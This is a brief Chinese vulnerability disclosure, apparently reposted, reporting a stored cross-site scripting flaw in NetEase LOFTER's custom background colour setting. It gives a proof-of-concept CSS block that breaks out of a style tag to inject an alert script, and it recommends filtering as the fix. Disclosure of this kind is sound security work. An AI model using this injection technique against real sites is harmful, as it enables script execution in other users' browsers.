作者:呆子不开口
详细说明:
自定义背景那里的颜色值会被写入html,未做过滤
漏洞 证明:
<style type="text/css">
html , body {background: #eeeded;}</style><script>alert(1);</script><style type="text/css">lvwei {lvwei:lvwei;}
a {color: #78be4e;}HdhCmsTest2cto测试数据
.navinfo {color: #78be4e;}
.navlnk {color: #78be4e;}
.searchinput {color: #78be4e;}
input::-webkit-input-placeholder {color: #78be4e;}
input:-moz-placeholder {color: #78be4e);}
.postphoto, .posttext, .postvideo, .postmusic{border-top: 2px solid #78be4e;}
</style>
修复方案:
过滤
查看更多关于网易lofter一处存储xss及修复方案 - 网站安全 - 自的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11244